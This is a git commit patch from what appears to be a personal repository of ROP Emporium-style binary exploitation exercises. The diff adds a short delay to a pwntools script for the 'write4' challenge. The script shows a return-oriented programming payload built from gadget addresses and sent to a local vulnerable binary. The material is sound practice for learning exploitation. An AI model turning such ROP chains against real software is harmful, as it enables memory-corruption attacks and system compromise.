From 3f54969f581fd311c09b1c21758ad9aa4a8784f4 Mon Sep 17 00:00:00 2001 From: Brett Weiland Date: Wed, 16 Dec 2020 21:33:39 -0600 Subject: new file: x86_64/badchars/exploit.py new file: x86_64/badchars/exploit_dirty.py new file: x86_64/badchars/usefullstuff deleted: x86_64/write4/.exploit.py.swp deleted: x86_64/write4/.useful_gadgets.swp modified: x86_64/write4/exploit.py --- x86_64/write4/.exploit.py.swp | Bin 12288 -> 0 bytes x86_64/write4/.useful_gadgets.swp | Bin 12288 -> 0 bytes x86_64/write4/core | Bin 0 -> 4427776 bytes x86_64/write4/exploit.py | 2 ++ 4 files changed, 2 insertions(+) delete mode 100644 x86_64/write4/.exploit.py.swp delete mode 100644 x86_64/write4/.useful_gadgets.swp create mode 100644 x86_64/write4/core (limited to 'x86_64/write4') diff --git a/x86_64/write4/.exploit.py.swp b/x86_64/write4/.exploit.py.swp deleted file mode 100644 index 5602feb..0000000 Binary files a/x86_64/write4/.exploit.py.swp and /dev/null differ diff --git a/x86_64/write4/.useful_gadgets.swp b/x86_64/write4/.useful_gadgets.swp deleted file mode 100644 index f89dc3e..0000000 Binary files a/x86_64/write4/.useful_gadgets.swp and /dev/null differ diff --git a/x86_64/write4/core b/x86_64/write4/core new file mode 100644 index 0000000..857be86 Binary files /dev/null and b/x86_64/write4/core differ diff --git a/x86_64/write4/exploit.py b/x86_64/write4/exploit.py index f8b294e..026687f 100755 --- a/x86_64/write4/exploit.py +++ b/x86_64/write4/exploit.py @@ -1,5 +1,6 @@ #!/usr/bin/env python3 from pwn import * +from time import sleep prog = process('./write4') payload = b'' @@ -15,5 +16,6 @@ payload += p64(0x0000000000600df0 + 0x00000df0) # addr of init_array section payload += p64(0x0000000000400510) # print_file@plt payload += b"\n" prog.sendline(payload) +sleep(0.5) print(str(prog.recv(), 'UTF-8')) prog.close() -- cgit v1.2.3